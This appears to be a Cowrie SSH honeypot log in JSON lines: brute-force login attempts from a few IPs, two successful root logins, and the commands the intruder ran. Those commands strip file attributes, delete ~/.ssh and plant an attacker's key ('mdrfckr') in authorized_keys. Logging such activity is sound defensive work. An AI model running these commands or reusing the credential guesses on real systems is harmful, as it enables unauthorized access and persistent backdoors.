{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:45:15.750734Z","src_ip":"212.227.235.229","session":"1d45f47b0a3c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55924,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d1595953443","protocol":"ssh","message":"New connection: 212.227.235.229:55924 (1.2.3.4:22) [session: 1d1595953443]","sensor":"my-vps","timestamp":"2025-09-09T01:45:15.960920Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:45:15.962146Z","src_ip":"212.227.235.229","session":"1d1595953443"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:45:16.198272Z","src_ip":"212.227.235.229","session":"1d1595953443"}
{"eventid":"cowrie.login.failed","username":"access","password":"P@ssw0rd","message":"login attempt [access/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-09-09T01:45:16.845257Z","src_ip":"212.227.235.229","session":"1d45f47b0a3c"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"111111","message":"login attempt [nginx/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T01:45:17.181964Z","src_ip":"212.227.235.229","session":"1d1595953443"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:18.112464Z","src_ip":"212.227.235.229","session":"1d45f47b0a3c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:18.419103Z","src_ip":"212.227.235.229","session":"1d1595953443"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51430,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8de4b4617cc","protocol":"ssh","message":"New connection: 212.227.235.229:51430 (1.2.3.4:22) [session: f8de4b4617cc]","sensor":"my-vps","timestamp":"2025-09-09T01:45:25.502180Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:45:25.503545Z","src_ip":"212.227.235.229","session":"f8de4b4617cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:45:25.771339Z","src_ip":"212.227.235.229","session":"f8de4b4617cc"}
{"eventid":"cowrie.login.failed","username":"info","password":"abc123","message":"login attempt [info/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T01:45:26.885724Z","src_ip":"212.227.235.229","session":"f8de4b4617cc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43100,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a004584b986","protocol":"ssh","message":"New connection: 212.227.235.229:43100 (1.2.3.4:22) [session: 1a004584b986]","sensor":"my-vps","timestamp":"2025-09-09T01:45:27.033379Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:45:27.034004Z","src_ip":"212.227.235.229","session":"1a004584b986"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:45:27.287872Z","src_ip":"212.227.235.229","session":"1a004584b986"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:28.154934Z","src_ip":"212.227.235.229","session":"f8de4b4617cc"}
{"eventid":"cowrie.login.failed","username":"tom","password":"1234567","message":"login attempt [tom/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T01:45:28.345073Z","src_ip":"212.227.235.229","session":"1a004584b986"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:29.601445Z","src_ip":"212.227.235.229","session":"1a004584b986"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50680,"dst_ip":"1.2.3.4","dst_port":22,"session":"e5e846dc3190","protocol":"ssh","message":"New connection: 212.227.235.229:50680 (1.2.3.4:22) [session: e5e846dc3190]","sensor":"my-vps","timestamp":"2025-09-09T01:45:29.975659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:45:29.976515Z","src_ip":"212.227.235.229","session":"e5e846dc3190"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:45:30.218031Z","src_ip":"212.227.235.229","session":"e5e846dc3190"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-09T01:45:31.226558Z","src_ip":"212.227.235.229","session":"e5e846dc3190"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47750,"dst_ip":"1.2.3.4","dst_port":22,"session":"fecd595a42a2","protocol":"ssh","message":"New connection: 212.227.125.160:47750 (1.2.3.4:22) [session: fecd595a42a2]","sensor":"my-vps","timestamp":"2025-09-09T01:45:32.085164Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:32.130937Z","src_ip":"212.227.125.160","session":"fecd595a42a2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:32.470030Z","src_ip":"212.227.235.229","session":"e5e846dc3190"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52456,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b95a39d502f","protocol":"ssh","message":"New connection: 212.227.235.229:52456 (1.2.3.4:22) [session: 3b95a39d502f]","sensor":"my-vps","timestamp":"2025-09-09T01:45:39.495910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:45:39.496891Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:45:39.616570Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.login.success","username":"root","password":"packers","message":"login attempt [root/packers] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:45:40.133696Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:45:40.421074Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:45:40.421765Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T01:45:40.422565Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:40.542714Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T01:45:40.843231Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T01:45:40.843926Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T01:45:40.964043Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:40.964879Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52470,"dst_ip":"1.2.3.4","dst_port":22,"session":"bcc69821a5b2","protocol":"ssh","message":"New connection: 212.227.235.229:52470 (1.2.3.4:22) [session: bcc69821a5b2]","sensor":"my-vps","timestamp":"2025-09-09T01:45:41.078800Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:45:41.079531Z","src_ip":"212.227.235.229","session":"bcc69821a5b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:45:41.197208Z","src_ip":"212.227.235.229","session":"bcc69821a5b2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T01:45:41.708314Z","src_ip":"212.227.235.229","session":"bcc69821a5b2"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:42.828909Z","src_ip":"212.227.235.229","session":"bcc69821a5b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52486,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b34e8ef7da3","protocol":"ssh","message":"New connection: 212.227.235.229:52486 (1.2.3.4:22) [session: 3b34e8ef7da3]","sensor":"my-vps","timestamp":"2025-09-09T01:45:42.948087Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:45:42.949090Z","src_ip":"212.227.235.229","session":"3b34e8ef7da3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T01:45:43.068401Z","src_ip":"212.227.235.229","session":"3b34e8ef7da3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T01:45:43.586331Z","src_ip":"212.227.235.229","session":"3b34e8ef7da3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:43.707687Z","src_ip":"212.227.235.229","session":"3b34e8ef7da3"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:45:43.708679Z","src_ip":"212.227.235.229","session":"3b95a39d502f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44895,"dst_ip":"1.2.3.4","dst_port":23,"session":"d67b6a893272","protocol":"telnet","message":"New connection: 212.227.235.229:44895 (1.2.3.4:23) [session: d67b6a893272]","sensor":"my-vps","timestamp":"2025-09-09T01:45:50.585330Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54694,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8ab81659c78","protocol":"ssh","message":"New connection: 217.72.205.35:54694 (1.2.3.4:22) [session: e8ab81659c78]","sensor":"my-vps","timestamp":"2025-09-09T01:46:05.195020Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T01:46:05.196050Z","src_ip":"217.72.205.35","session":"e8ab81659c78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59398,"dst_ip":"1.2.3.4","dst_port":22,"session":"068a58f4091d","protocol":"ssh","message":"New connection: 212.227.235.229:59398 (1.2.3.4:22) [session: 068a58f4091d]","sensor":"my-vps","timestamp":"2025-09-09T01:46:15.659958Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T01:46:15.660871Z","src_ip":"212.227.235.229","session":"068a58f4091d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gc